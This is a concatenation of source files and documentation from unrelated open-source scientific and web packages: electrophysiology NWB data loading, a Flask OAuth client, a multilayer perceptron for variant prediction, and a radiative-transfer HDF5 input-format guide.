# File: /IPFX-1.0.8.tar.gz/IPFX-1.0.8/ipfx/dataset/create.py
from typing import Optional, Dict, Any
import re
from pathlib import Path
import h5py
import numpy as np
import allensdk.core.json_utilities as ju
from ipfx.dataset.ephys_data_set import EphysDataSet
from ipfx.stimulus import StimulusOntology
from ipfx.dataset.hbg_nwb_data import HBGNWBData
from ipfx.dataset.mies_nwb_data import MIESNWBData
from ipfx.string_utils import to_str
from ipfx.dataset.labnotebook import LabNotebookReaderIgorNwb
def get_scalar_value(dataset_from_nwb):
"""
Some values in NWB are stored as scalar whereas others as np.ndarrays with
dimension 1. Use this function to retrieve the scalar value itself.
"""
if isinstance(dataset_from_nwb, np.ndarray):
return dataset_from_nwb.item()
return dataset_from_nwb
def is_file_mies(path: str) -> bool:
with h5py.File(path, "r") as fil:
if "generated_by" in fil["general"].keys():
generated_by = dict(fil["general"]["generated_by"][:])
return generated_by.get("Package", "None") == "MIES"
return False
def get_nwb_version(nwb_file: str) -> Dict[str, Any]:
"""
Find version of the nwb file
Parameters
----------
nwb_file
Returns
-------
    dict in the format:

        {
            "major": int or None,
            "full": str or None
        }
"""
with h5py.File(nwb_file, 'r') as f:
if "nwb_version" in f: # In version 0 and 1 this is a dataset
nwb_version = get_scalar_value(f["nwb_version"][()])
nwb_version_str = to_str(nwb_version)
if nwb_version is not None and re.match("^NWB-", nwb_version_str):
return {
"major": int(nwb_version_str[4]),
"full": nwb_version_str
}
elif "nwb_version" in f.attrs: # in version 2 this is an attribute
nwb_version_str = to_str(f.attrs["nwb_version"])
if nwb_version_str is not None and (
re.match("^2", nwb_version_str) or
re.match("^NWB-2", nwb_version_str)
):
return {"major": 2, "full": nwb_version_str}
return {"major": None, "full": None}
def create_ephys_data_set(
nwb_file: str,
sweep_info: Optional[Dict[str, Any]] = None,
ontology: Optional[str] = None
) -> EphysDataSet:
"""
Create an ephys data set with the appropriate nwbdata reader class
Parameters
----------
nwb_file
sweep_info
ontology
Returns
-------
EphysDataSet
"""
nwb_version = get_nwb_version(nwb_file)
is_mies = is_file_mies(nwb_file)
if not ontology:
ontology = StimulusOntology.DEFAULT_STIMULUS_ONTOLOGY_FILE
if isinstance(ontology, (str, Path)):
ontology = StimulusOntology(ju.read(ontology))
if nwb_version["major"] == 2:
if is_mies:
labnotebook = LabNotebookReaderIgorNwb(nwb_file)
nwb_data = MIESNWBData(nwb_file, labnotebook, ontology)
else:
nwb_data = HBGNWBData(nwb_file, ontology)
else:
raise ValueError(
"Unsupported or unknown NWB major version {} ({})".format(
nwb_version["major"], nwb_version["full"]
)
)
return EphysDataSet(
sweep_info=sweep_info,
data=nwb_data,
    )
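
# --- Usage sketch (illustrative; not part of the original module). The
# file name "experiment.nwb" is a hypothetical placeholder path.
if __name__ == "__main__":
    version = get_nwb_version("experiment.nwb")
    print("NWB version:", version)  # e.g. {'major': 2, 'full': '2.2.4'}
    if version["major"] == 2:
        # Default stimulus ontology, no precomputed sweep info.
        data_set = create_ephys_data_set("experiment.nwb")
        print(type(data_set).__name__)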
# File: /Flask_OAuthlib-0.9.6-py3-none-any.whl/flask_oauthlib/client.py
import logging
import oauthlib.oauth1
import oauthlib.oauth2
from copy import copy
from functools import wraps
from oauthlib.common import to_unicode, PY3, add_params_to_uri
from flask import request, redirect, json, session, current_app
from werkzeug.urls import url_quote, url_decode, url_encode
from werkzeug.http import parse_options_header
from werkzeug.utils import cached_property
from .utils import to_bytes
try:
from urlparse import urljoin
import urllib2 as http
except ImportError:
from urllib import request as http
from urllib.parse import urljoin
log = logging.getLogger('flask_oauthlib')
if PY3:
string_types = (str,)
else:
string_types = (str, unicode)
__all__ = ('OAuth', 'OAuthRemoteApp', 'OAuthResponse', 'OAuthException')
class OAuth(object):
"""Registry for remote applications.
:param app: the app instance of Flask
Create an instance with Flask::
oauth = OAuth(app)
"""
state_key = 'oauthlib.client'
def __init__(self, app=None):
self.remote_apps = {}
self.app = app
if app:
self.init_app(app)
def init_app(self, app):
"""Init app with Flask instance.
You can also pass the instance of Flask later::
oauth = OAuth()
oauth.init_app(app)
"""
self.app = app
app.extensions = getattr(app, 'extensions', {})
app.extensions[self.state_key] = self
def remote_app(self, name, register=True, **kwargs):
"""Registers a new remote application.
:param name: the name of the remote application
:param register: whether the remote app will be registered
Find more parameters from :class:`OAuthRemoteApp`.
"""
remote = OAuthRemoteApp(self, name, **kwargs)
if register:
assert name not in self.remote_apps
self.remote_apps[name] = remote
return remote
def __getattr__(self, key):
try:
return object.__getattribute__(self, key)
except AttributeError:
app = self.remote_apps.get(key)
if app:
return app
raise AttributeError('No such app: %s' % key)
_etree = None
def get_etree():
global _etree
if _etree is not None:
return _etree
try:
from lxml import etree as _etree
except ImportError:
try:
from xml.etree import cElementTree as _etree
except ImportError:
try:
from xml.etree import ElementTree as _etree
except ImportError:
raise TypeError('lxml or etree not found')
return _etree
def parse_response(resp, content, strict=False, content_type=None):
"""Parse the response returned by :meth:`OAuthRemoteApp.http_request`.
:param resp: response of http_request
:param content: content of the response
:param strict: strict mode for form urlencoded content
:param content_type: assign a content type manually
"""
if not content_type:
content_type = resp.headers.get('content-type', 'application/json')
ct, options = parse_options_header(content_type)
if ct in ('application/json', 'text/javascript'):
if not content:
return {}
return json.loads(content)
if ct in ('application/xml', 'text/xml'):
return get_etree().fromstring(content)
if ct != 'application/x-www-form-urlencoded' and strict:
return content
charset = options.get('charset', 'utf-8')
return url_decode(content, charset=charset).to_dict()
def prepare_request(uri, headers=None, data=None, method=None):
"""Make request parameters right."""
if headers is None:
headers = {}
if data and not method:
method = 'POST'
elif not method:
method = 'GET'
if method == 'GET' and data:
uri = add_params_to_uri(uri, data)
data = None
return uri, headers, data, method
def encode_request_data(data, format):
if format is None:
return data, None
if format == 'json':
return json.dumps(data or {}), 'application/json'
if format == 'urlencoded':
return url_encode(data or {}), 'application/x-www-form-urlencoded'
raise TypeError('Unknown format %r' % format)
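
# --- Illustrative sketch (not part of the original module): how
# ``prepare_request`` normalizes the (uri, headers, data, method) tuple.
# The example.com URLs are placeholders.
if __name__ == "__main__":
    # GET with data: the parameters are folded into the query string.
    uri, headers, data, method = prepare_request(
        'https://api.example.com/items', data={'page': '1'}, method='GET'
    )
    print(method, uri, data)  # GET https://api.example.com/items?page=1 None
    # Data without an explicit method defaults to POST, data left intact.
    uri, headers, data, method = prepare_request(
        'https://api.example.com/items', data={'name': 'demo'}
    )
    print(method, data)  # POST {'name': 'demo'}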
class OAuthResponse(object):
def __init__(self, resp, content, content_type=None):
self._resp = resp
self.raw_data = content
self.data = parse_response(
resp, content, strict=True,
content_type=content_type,
)
@property
def status(self):
"""The status code of the response."""
return self._resp.code
class OAuthException(RuntimeError):
def __init__(self, message, type=None, data=None):
self.message = message
self.type = type
self.data = data
def __str__(self):
if PY3:
return self.message
return self.message.encode('utf-8')
def __unicode__(self):
return self.message
class OAuthRemoteApp(object):
"""Represents a remote application.
:param oauth: the associated :class:`OAuth` object
:param name: the name of the remote application
:param base_url: the base url for every request
:param request_token_url: the url for requesting new tokens
:param access_token_url: the url for token exchange
:param authorize_url: the url for authorization
:param consumer_key: the application specific consumer key
:param consumer_secret: the application specific consumer secret
:param request_token_params: an optional dictionary of parameters
to forward to the request token url
or authorize url depending on oauth
version
    :param request_token_method: the HTTP method that should be used for
                                 the request_token_url. Default is ``GET``
:param access_token_params: an optional dictionary of parameters to
forward to the access token url
    :param access_token_method: the HTTP method that should be used for
                                the access_token_url. Default is ``POST``
    :param access_token_headers: additional headers that should be used for
the access_token_url.
:param content_type: force to parse the content with this content_type,
usually used when the server didn't return the
right content type.
.. versionadded:: 0.3.0
:param app_key: lazy load configuration from Flask app config with
this app key
"""
def __init__(
self, oauth, name,
base_url=None,
request_token_url=None,
access_token_url=None,
authorize_url=None,
consumer_key=None,
consumer_secret=None,
rsa_key=None,
signature_method=None,
request_token_params=None,
request_token_method=None,
access_token_params=None,
access_token_method=None,
access_token_headers=None,
content_type=None,
app_key=None,
encoding='utf-8',
):
self.oauth = oauth
self.name = name
self._base_url = base_url
self._request_token_url = request_token_url
self._access_token_url = access_token_url
self._authorize_url = authorize_url
self._consumer_key = consumer_key
self._consumer_secret = consumer_secret
self._rsa_key = rsa_key
self._signature_method = signature_method
self._request_token_params = request_token_params
self._request_token_method = request_token_method
self._access_token_params = access_token_params
self._access_token_method = access_token_method
self._access_token_headers = access_token_headers or {}
self._content_type = content_type
self._tokengetter = None
self.app_key = app_key
self.encoding = encoding
# Check for required authentication information.
# Skip this check if app_key is specified, since the information is
# specified in the Flask config, instead.
if not app_key:
if signature_method == oauthlib.oauth1.SIGNATURE_RSA:
# check for consumer_key and rsa_key
if not consumer_key or not rsa_key:
raise TypeError(
"OAuthRemoteApp with RSA authentication requires "
"consumer key and rsa key"
)
else:
# check for consumer_key and consumer_secret
if not consumer_key or not consumer_secret:
raise TypeError(
"OAuthRemoteApp requires consumer key and secret"
)
@cached_property
def base_url(self):
return self._get_property('base_url')
@cached_property
def request_token_url(self):
return self._get_property('request_token_url', None)
@cached_property
def access_token_url(self):
return self._get_property('access_token_url')
@cached_property
def authorize_url(self):
return self._get_property('authorize_url')
@cached_property
def consumer_key(self):
return self._get_property('consumer_key')
@cached_property
def consumer_secret(self):
return self._get_property('consumer_secret')
@cached_property
def rsa_key(self):
return self._get_property('rsa_key')
@cached_property
def signature_method(self):
return self._get_property('signature_method')
@cached_property
def request_token_params(self):
return self._get_property('request_token_params', {})
@cached_property
def request_token_method(self):
return self._get_property('request_token_method', 'GET')
@cached_property
def access_token_params(self):
return self._get_property('access_token_params', {})
@cached_property
def access_token_method(self):
return self._get_property('access_token_method', 'POST')
@cached_property
def content_type(self):
return self._get_property('content_type', None)
def _get_property(self, key, default=False):
attr = getattr(self, '_%s' % key)
if attr is not None:
return attr
if not self.app_key:
if default is not False:
return default
return attr
app = self.oauth.app or current_app
if self.app_key in app.config:
# works with dict config
config = app.config[self.app_key]
if default is not False:
return config.get(key, default)
return config[key]
# works with plain text config
config_key = "%s_%s" % (self.app_key, key.upper())
if default is not False:
return app.config.get(config_key, default)
return app.config[config_key]
def get_oauth1_client_params(self, token):
params = copy(self.request_token_params) or {}
if token and isinstance(token, (tuple, list)):
params["resource_owner_key"] = token[0]
params["resource_owner_secret"] = token[1]
# Set params for SIGNATURE_RSA
if self.signature_method == oauthlib.oauth1.SIGNATURE_RSA:
params["signature_method"] = self.signature_method
params["rsa_key"] = self.rsa_key
return params
def make_client(self, token=None):
# request_token_url is for oauth1
if self.request_token_url:
# get params for client
params = self.get_oauth1_client_params(token)
client = oauthlib.oauth1.Client(
client_key=self.consumer_key,
client_secret=self.consumer_secret,
**params
)
else:
if token:
if isinstance(token, (tuple, list)):
token = {'access_token': token[0]}
elif isinstance(token, string_types):
token = {'access_token': token}
client = oauthlib.oauth2.WebApplicationClient(
self.consumer_key, token=token
)
return client
@staticmethod
def http_request(uri, headers=None, data=None, method=None):
uri, headers, data, method = prepare_request(
uri, headers, data, method
)
log.debug('Request %r with %r method' % (uri, method))
req = http.Request(uri, headers=headers, data=data)
req.get_method = lambda: method.upper()
try:
resp = http.urlopen(req)
content = resp.read()
resp.close()
return resp, content
except http.HTTPError as resp:
content = resp.read()
resp.close()
return resp, content
def get(self, *args, **kwargs):
"""Sends a ``GET`` request. Accepts the same parameters as
:meth:`request`.
"""
kwargs['method'] = 'GET'
return self.request(*args, **kwargs)
def post(self, *args, **kwargs):
"""Sends a ``POST`` request. Accepts the same parameters as
:meth:`request`.
"""
kwargs['method'] = 'POST'
return self.request(*args, **kwargs)
def put(self, *args, **kwargs):
"""Sends a ``PUT`` request. Accepts the same parameters as
:meth:`request`.
"""
kwargs['method'] = 'PUT'
return self.request(*args, **kwargs)
def delete(self, *args, **kwargs):
"""Sends a ``DELETE`` request. Accepts the same parameters as
:meth:`request`.
"""
kwargs['method'] = 'DELETE'
return self.request(*args, **kwargs)
def patch(self, *args, **kwargs):
"""Sends a ``PATCH`` request. Accepts the same parameters as
:meth:`post`.
"""
kwargs['method'] = 'PATCH'
return self.request(*args, **kwargs)
def request(self, url, data=None, headers=None, format='urlencoded',
method='GET', content_type=None, token=None):
"""
Sends a request to the remote server with OAuth tokens attached.
:param data: the data to be sent to the server.
:param headers: an optional dictionary of headers.
:param format: the format for the `data`. Can be `urlencoded` for
URL encoded data or `json` for JSON.
:param method: the HTTP request method to use.
        :param content_type: an optional content type. If a content type
                             is provided, the data is passed as is, and
                             the `format` is ignored.
:param token: an optional token to pass, if it is None, token will
be generated by tokengetter.
"""
headers = dict(headers or {})
if token is None:
token = self.get_request_token()
client = self.make_client(token)
url = self.expand_url(url)
if method == 'GET':
assert format == 'urlencoded'
if data:
url = add_params_to_uri(url, data)
data = None
else:
if content_type is None:
data, content_type = encode_request_data(data, format)
if content_type is not None:
headers['Content-Type'] = content_type
if self.request_token_url:
# oauth1
uri, headers, body = client.sign(
url, http_method=method, body=data, headers=headers
)
else:
# oauth2
uri, headers, body = client.add_token(
url, http_method=method, body=data, headers=headers
)
if hasattr(self, 'pre_request'):
# This is designed for some rubbish services like weibo.
# Since they don't follow the standards, we need to
# change the uri, headers, or body.
uri, headers, body = self.pre_request(uri, headers, body)
if body:
data = to_bytes(body, self.encoding)
else:
data = None
resp, content = self.http_request(
            uri, headers, data=data, method=method
)
return OAuthResponse(resp, content, self.content_type)
def authorize(self, callback=None, state=None, **kwargs):
"""
Returns a redirect response to the remote authorization URL with
the signed callback given.
:param callback: a redirect url for the callback
:param state: an optional value to embed in the OAuth request.
Use this if you want to pass around application
state (e.g. CSRF tokens).
:param kwargs: add optional key/value pairs to the query string
"""
params = dict(self.request_token_params) or {}
params.update(**kwargs)
if self.request_token_url:
token = self.generate_request_token(callback)[0]
url = '%s?oauth_token=%s' % (
self.expand_url(self.authorize_url), url_quote(token)
)
if params:
url += '&' + url_encode(params)
else:
assert callback is not None, 'Callback is required for OAuth2'
client = self.make_client()
if 'scope' in params:
scope = params.pop('scope')
else:
scope = None
if isinstance(scope, str):
                # oauthlib needs unicode
scope = _encode(scope, self.encoding)
if 'state' in params:
if not state:
state = params.pop('state')
else:
# remove state in params
params.pop('state')
if callable(state):
                # state can be a function that generates a random string
state = state()
session['%s_oauthredir' % self.name] = callback
url = client.prepare_request_uri(
self.expand_url(self.authorize_url),
redirect_uri=callback,
scope=scope,
state=state,
**params
)
return redirect(url)
def tokengetter(self, f):
"""
Register a function as token getter.
"""
self._tokengetter = f
return f
def expand_url(self, url):
return urljoin(self.base_url, url)
def generate_request_token(self, callback=None):
# for oauth1 only
if callback is not None:
callback = urljoin(request.url, callback)
client = self.make_client()
client.callback_uri = _encode(callback, self.encoding)
realm = self.request_token_params.get('realm')
realms = self.request_token_params.get('realms')
if not realm and realms:
realm = ' '.join(realms)
uri, headers, _ = client.sign(
self.expand_url(self.request_token_url),
http_method=self.request_token_method,
realm=realm,
)
log.debug('Generate request token header %r', headers)
resp, content = self.http_request(
uri, headers, method=self.request_token_method,
)
data = parse_response(resp, content)
if not data:
raise OAuthException(
'Invalid token response from %s' % self.name,
type='token_generation_failed'
)
if resp.code not in (200, 201):
message = 'Failed to generate request token'
if 'oauth_problem' in data:
message += ' (%s)' % data['oauth_problem']
raise OAuthException(
message,
type='token_generation_failed',
data=data,
)
tup = (data['oauth_token'], data['oauth_token_secret'])
session['%s_oauthtok' % self.name] = tup
return tup
def get_request_token(self):
assert self._tokengetter is not None, 'missing tokengetter'
rv = self._tokengetter()
if rv is None:
raise OAuthException('No token available', type='token_missing')
return rv
def handle_oauth1_response(self, args):
"""Handles an oauth1 authorization response."""
client = self.make_client()
client.verifier = args.get('oauth_verifier')
tup = session.get('%s_oauthtok' % self.name)
if not tup:
raise OAuthException(
                'Token not found, maybe you disabled cookies',
type='token_not_found'
)
client.resource_owner_key = tup[0]
client.resource_owner_secret = tup[1]
uri, headers, data = client.sign(
self.expand_url(self.access_token_url),
_encode(self.access_token_method)
)
headers.update(self._access_token_headers)
resp, content = self.http_request(
uri, headers, to_bytes(data, self.encoding),
method=self.access_token_method
)
data = parse_response(resp, content)
if resp.code not in (200, 201):
raise OAuthException(
'Invalid response from %s' % self.name,
type='invalid_response', data=data
)
return data
def handle_oauth2_response(self, args):
"""Handles an oauth2 authorization response."""
client = self.make_client()
remote_args = {
'code': args.get('code'),
'client_secret': self.consumer_secret,
'redirect_uri': session.get('%s_oauthredir' % self.name)
}
log.debug('Prepare oauth2 remote args %r', remote_args)
remote_args.update(self.access_token_params)
headers = copy(self._access_token_headers)
if self.access_token_method == 'POST':
headers.update({'Content-Type': 'application/x-www-form-urlencoded'})
body = client.prepare_request_body(**remote_args)
resp, content = self.http_request(
self.expand_url(self.access_token_url),
headers=headers,
data=to_bytes(body, self.encoding),
method=self.access_token_method,
)
elif self.access_token_method == 'GET':
qs = client.prepare_request_body(**remote_args)
url = self.expand_url(self.access_token_url)
url += ('?' in url and '&' or '?') + qs
resp, content = self.http_request(
url,
headers=headers,
method=self.access_token_method,
)
else:
raise OAuthException(
'Unsupported access_token_method: %s' %
self.access_token_method
)
data = parse_response(resp, content, content_type=self.content_type)
if resp.code not in (200, 201):
raise OAuthException(
'Invalid response from %s' % self.name,
type='invalid_response', data=data
)
return data
def handle_unknown_response(self):
"""Handles a unknown authorization response."""
return None
def authorized_response(self, args=None):
"""Handles authorization response smartly."""
if args is None:
args = request.args
if 'oauth_verifier' in args:
data = self.handle_oauth1_response(args)
elif 'code' in args:
data = self.handle_oauth2_response(args)
else:
data = self.handle_unknown_response()
# free request token
session.pop('%s_oauthtok' % self.name, None)
session.pop('%s_oauthredir' % self.name, None)
return data
def authorized_handler(self, f):
"""Handles an OAuth callback.
.. versionchanged:: 0.7
@authorized_handler is deprecated in favor of authorized_response.
"""
@wraps(f)
def decorated(*args, **kwargs):
            log.warning(
'@authorized_handler is deprecated in favor of '
'authorized_response'
)
data = self.authorized_response()
return f(*((data,) + args), **kwargs)
return decorated
def _encode(text, encoding='utf-8'):
if encoding:
return to_unicode(text, encoding)
    return text
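
# --- Usage sketch (illustrative; not part of the original module). The
# consumer key/secret are placeholders; the endpoints follow the pattern
# from the flask-oauthlib documentation example.
if __name__ == "__main__":
    from flask import Flask

    app = Flask(__name__)
    app.secret_key = 'development'  # needed for session-based token storage
    oauth = OAuth(app)
    twitter = oauth.remote_app(
        'twitter',
        base_url='https://api.twitter.com/1.1/',
        request_token_url='https://api.twitter.com/oauth/request_token',
        access_token_url='https://api.twitter.com/oauth/access_token',
        authorize_url='https://api.twitter.com/oauth/authorize',
        consumer_key='<consumer-key>',
        consumer_secret='<consumer-secret>',
    )

    @twitter.tokengetter
    def get_twitter_token():
        # Normally read from the session or a database.
        return session.get('twitter_token')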
# File: /CombiVEP-0.1.2.tar.gz/CombiVEP-0.1.2/combivep/engine/mlp.py
import numpy as np
import combivep.settings as combivep_settings
class Mlp(object):
"""MultiLayer Perceptron class"""
def __init__(self, n_features,
seed=combivep_settings.DEFAULT_SEED,
n_hidden_nodes=combivep_settings.DEFAULT_HIDDEN_NODES):
object.__init__(self)
#set initial configuration values and memorize input
self.__n_features = n_features
self.__n_hidden_nodes = n_hidden_nodes
self.best_weights1 = []
self.best_weights2 = []
        #set initial values of weight matrices to random small values
np.random.seed(seed)
self.__weights1 = 0.01 * np.random.rand(n_hidden_nodes, self.__n_features+1)
self.__weights2 = 0.01 * np.random.rand(1, n_hidden_nodes+1)
        #set initial values of momentum matrices to zeros
self.__momentums1 = np.zeros((n_hidden_nodes, self.__n_features+1))
self.__momentums2 = np.zeros((1, n_hidden_nodes+1))
def forward_propagation(self, dataset):
#calculate sum of product in the hidden layer
in1 = np.dot(self.__weights1,
np.concatenate((dataset.feature_vectors,
np.ones((1, dataset.n_data))
),
axis=0
)
)
#calculate outputs of hidden layer using non-linear function
self.__out1 = np.concatenate((2/(1+np.exp(-in1))-1,
np.ones((1, dataset.n_data))
),
axis=0
)
#calculate sum of product in the output node
in2 = np.dot(self.__weights2, self.__out1)
#calculate output of mlp using non-linear function
self.__out2 = 1/(1+np.exp(-in2))
#return prediction result
return self.__out2
def backward_propagation(self, training_dataset):
model_error = self.calculate_error(self.__out2, training_dataset.targets)
self.__error_signal_output = np.multiply(model_error,
np.multiply((1-self.__out2),
self.__out2
)
)
self.__error_signal_hidden = np.multiply(np.dot(self.__weights2.T,
self.__error_signal_output
),
np.multiply((1+self.__out1),
(1-self.__out1)
)
) * 0.5
self.__error_signal_hidden = self.__error_signal_hidden[0:self.__n_hidden_nodes]
return np.sum(np.absolute(model_error), axis=1).item(0)
def weight_update(self, training_dataset, coefficient=combivep_settings.MLP_COEFFICIENT, step_size=combivep_settings.STEP_SIZE):
self.__momentums1 = np.subtract((self.__momentums1*coefficient),
(np.dot(self.__error_signal_hidden,
np.concatenate((training_dataset.feature_vectors,
np.ones((1, training_dataset.n_data))
),
axis=0
).T
)
)*(1-coefficient)
)
self.__momentums2 = np.subtract((self.__momentums2*coefficient),
(np.dot(self.__error_signal_output,
self.__out1.T
)
)*(1-coefficient)
)
self.__weights1 = np.add(self.__weights1, np.multiply(self.__momentums1,
step_size)
)
self.__weights2 = np.add(self.__weights2, np.multiply(self.__momentums2,
step_size)
)
return self.__weights1, self.__weights2
def calculate_error(self, actual_output, expected_output):
return np.subtract(actual_output, expected_output)
def export_best_parameters(self, params_file=combivep_settings.USER_PARAMETERS_FILE):
np.savez(params_file, best_weights1=self.best_weights1, best_weights2=self.best_weights2)
def import_parameters(self, params_file=combivep_settings.USER_PARAMETERS_FILE):
params = np.load(params_file)
self.__weights1 = params['best_weights1']
self.__weights2 = params['best_weights2']
def get_weights1(self):
"""for unit testing purpose"""
        return self.__weights1
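
# --- Training sketch (illustrative; not part of the original module). The
# Mlp class expects dataset objects exposing `feature_vectors` (shape
# n_features x n_data), `n_data` and `targets` (shape 1 x n_data);
# _StubDataset below is a hypothetical stand-in for CombiVEP's real
# dataset classes.
if __name__ == "__main__":
    class _StubDataset(object):
        def __init__(self, features, targets):
            self.feature_vectors = features
            self.n_data = features.shape[1]
            self.targets = targets

    np.random.seed(0)
    training = _StubDataset(np.random.rand(5, 20),
                            np.random.randint(0, 2, (1, 20)))
    mlp = Mlp(n_features=5)
    for epoch in range(10):
        mlp.forward_propagation(training)
        error = mlp.backward_propagation(training)
        mlp.weight_update(training)
    print("final absolute error: %.4f" % error)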
.. File: /Hyperion-0.9.10.tar.gz/Hyperion-0.9.10/docs/advanced/model_file.rst

=======================
Model Input HDF5 Format
=======================
.. _input_intro:
Introduction
============
The radiation transfer code reads in an HDF5 file as input. The contents of the file have to follow a specific layout. To differentiate this format from other HDF5 files, we use the ``.rtin`` extension for input files to the radiation transfer code.
An ``.rtin`` file should contain the following four groups::
Dust/
Grid/
Sources/
Output/
These are described in `Dust`_, `Grid`_, `Sources`_, and `Output`_
respectively. In addition, a number of attributes should be set at the root level, and these are described in `Root-level attributes`_.
Dust
====
The `Dust`_ group should contain as many groups (or external/internal links
to groups) as dust types. The groups should be named::
dust_001/
dust_002/
...
Each group should have the layout described in :doc:`dust_file` or should be an external HDF5 link to an actual dust file.
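
For illustration, the dust groups can be populated by linking to existing
dust files (a minimal ``h5py`` sketch; the file names are placeholders)::

    import h5py

    with h5py.File('model.rtin', 'a') as f:
        dust = f.require_group('Dust')
        # Each dust population is an external link to a dust file on disk.
        dust['dust_001'] = h5py.ExternalLink('kmh94.hdf5', '/')
        dust['dust_002'] = h5py.ExternalLink('draine03.hdf5', '/')
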
Grid
====
The **Grid** group should contain two sub-groups, **Geometry**, and **Physics**, which are described below.
Geometry
--------
This group describes the geometry of the model (what type of grid is used, and
the position of the cell walls). The group should have an attribute, ``grid_type``, giving the type of grid as a string which can be:
* ``car``: cartesian grid
* ``sph_pol``: spherical polar grid
* ``cyl_pol``: cylindrical polar grid
* ``amr``: adaptive mesh refinement grid (AMR)
* ``oct``: octree grid
The content of the group then depends on the type of grid:
Cartesian (``car``)
^^^^^^^^^^^^^^^^^^^
The **Geometry** group should contain three tabular datasets named ``walls_1``,
``walls_2``, and ``walls_3``, which should each contain one column. The
``walls_1`` table should contain a column ``x`` giving the x position of the
cell walls as floating point values. Similarly, ``walls_2`` and ``walls_3``
should contain one column each, named ``y`` and ``z`` respectively, giving the
y and z position of the grid cell walls.
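
As a concrete sketch (using ``h5py`` and ``numpy``; the wall positions below
are arbitrary placeholder values)::

    import h5py
    import numpy as np

    with h5py.File('model.rtin', 'a') as f:
        geo = f.require_group('Grid/Geometry')
        geo.attrs['grid_type'] = 'car'
        # One-column table of x wall positions; walls_2/walls_3 follow the
        # same pattern with columns 'y' and 'z'.
        walls = np.zeros(11, dtype=[('x', 'f8')])
        walls['x'] = np.linspace(-1e16, 1e16, 11)
        geo.create_dataset('walls_1', data=walls)
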
Spherical Polar (``sph_pol``)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
The **Geometry** group should contain three tabular datasets named ``walls_1``,
``walls_2``, and ``walls_3``, which should each contain one column. The
``walls_1`` table should contain a column ``r`` giving the radial position of
the cell walls as floating point values. Similarly, ``walls_2`` and ``walls_3``
should contain one column each, named ``t`` and ``p`` respectively, giving the
theta and phi position of the grid cell walls.
Cylindrical Polar (``cyl_pol``)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
The **Geometry** group should contain three tabular datasets named ``walls_1``,
``walls_2``, and ``walls_3``, which should each contain one column. The
``walls_1`` table should contain a column ``w`` giving the radial position of
the cell walls as floating point values. Similarly, ``walls_2`` and ``walls_3``
should contain one column each, named ``z`` and ``p`` respectively, giving the
z and phi position of the grid cell walls.
AMR (``amr``)
^^^^^^^^^^^^^
The **Geometry** group should contain an attribute ``nlevels`` giving the
number of levels in the grid, as an integer, as well as one sub-group per
level. These groups should be formatted as **level_%05d** (i.e.
**level_00001**, **level_00002**, etc.) starting at **level_00001**.
Each **level_*** group should then contain an attribute ``ngrids`` giving the number of grids in the level, as an integer, as well as one sub-group per grid in the level. The sub-groups should be formatted as ``grid_%05d`` (e.g. **grid_00001**, **grid_00002**) starting at **grid_00001**.
Each **grid_*** group should contain the following attributes:
* ``xmin``, ``xmax``, ``ymin``, ``ymax``, ``zmin``, ``zmax``: the boundaries of
the grid, as floating point values.
* ``n1``, ``n2``, ``n3``: the number of cells (not walls) in each direction, as
integers.
Octree (``oct``)
^^^^^^^^^^^^^^^^
The **Geometry** group should contain the following attributes:
* ``x``, ``y``, ``z``: the coordinates of the center of the parent cell, as floating point values, in cm
* ``dx``, ``dy``, ``dz``: the size of the parent cell, as floating point values, in cm
In addition, the group should contain a 1-d array representing the ``refined`` array described in :doc:`indepth_oct`. The array should be given as an integer array instead of a boolean array.
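
For example, a parent cell that is refined once, with none of its eight
children refined further, corresponds to the following nine-element array
(a NumPy sketch; stored as integers rather than booleans)::

    import numpy as np

    # 1 = cell is subdivided into 8 children, 0 = leaf cell.
    # The parent comes first, followed by its eight (unrefined) children.
    refined = np.array([1, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int)
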
Physics
-------
This group describes the input quantities such as the density and optionally
the specific energy of the dust. In all cases where a ``density`` array should be specified, you may also give a ``specific_energy`` array with the same dimensions - this can be used as the initial temperature, or can be used as the temperature to use for the images/SED if the number of temperature iterations is set to zero.
Cartesian
^^^^^^^^^
The **Physics** group should contain a 4-d dataset array named ``density`` giving the density in c.g.s in each cell. The dimensions of the array should be ``(n_dust, n_z, n_y, n_x)``.
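
A minimal sketch writing a single-population density grid (``h5py``/``numpy``;
the grid size and the uniform density value are placeholders)::

    import h5py
    import numpy as np

    # Shape is (n_dust, n_z, n_y, n_x) for a cartesian grid.
    density = np.ones((1, 32, 32, 32)) * 1e-20  # g/cm^3

    with h5py.File('model.rtin', 'a') as f:
        phys = f.require_group('Grid/Physics')
        phys.create_dataset('density', data=density)
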
Spherical Polar
^^^^^^^^^^^^^^^
The **Physics** group should contain a 4-d dataset array named ``density`` giving the density in c.g.s in each cell. The dimensions of the array should be ``(n_dust, n_p, n_t, n_r)``.
Cylindrical Polar
^^^^^^^^^^^^^^^^^
The **Physics** group should contain a 4-d dataset array named ``density`` giving the density in c.g.s in each cell. The dimensions of the array should be ``(n_dust, n_p, n_z, n_w)``.
AMR
^^^
The **Physics** group should contain a structure similar to that used to
represent the geometry. The ``nlevels`` and ``ngrids`` attributes are not
needed, only the nested **level_*** and **grid_*** groups. Each **grid_***
group should then contain a 4-d dataset array named ``density`` giving the
density in c.g.s in each cell. The dimensions of the array should be ``(n_dust,
n_z, n_y, n_x)``.
Octree
^^^^^^
The **Physics** group should contain a 1-d dataset array named ``density`` giving the density in c.g.s in each cell. Each cell in this array should match a cell in the ``refined`` array discussed in `Geometry`_.
Sources
=======
This should contain one group per source. The name of the
groups is not important, and the Python code uses names such as
**source_00001**. Each sub-group will contain certain attributes and datasets depending on the source type, as described below.
Common attributes
-----------------
All sources should have the following attributes:
* ``type``: the type of the source, given as a string. This can be ``point``
(for point sources), ``sphere`` (for spherical sources), ``map`` (for diffuse
sources), ``extern_sph`` (for external spherical illumination),
``extern_box`` (for external illumination from a box), or ``plane_parallel``
(for a plane-parallel beam).
* ``luminosity``: the luminosity of the source, as a floating point value, in
c.g.s
* ``peeloff``: whether to include the source when computing images with
peeling-off, as a string that should be either ``yes`` or ``no``.
* ``spectrum``: the type of spectrum to use, as a string. This can be either:
* ``spectrum``, to indicate that a spectrum has been numerically specified.
In this case, the group representing the source should also contain a
tabular dataset with two columns: ``nu``, the frequency in Hz, and ``fnu``,
the monochromatic flux per frequency (the exact units are not important,
because the spectrum is renormalized).
* ``temperature``, to specify that a temperature has been specified. In this
case, the temperature should be given as an attribute ``temperature``, as a
floating-point value.
* ``lte``, to indicate that the source should emit from the dust emissivities
in the cell (this is used mainly for diffuse sources). In this case, no
    additional attributes need to be specified.
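
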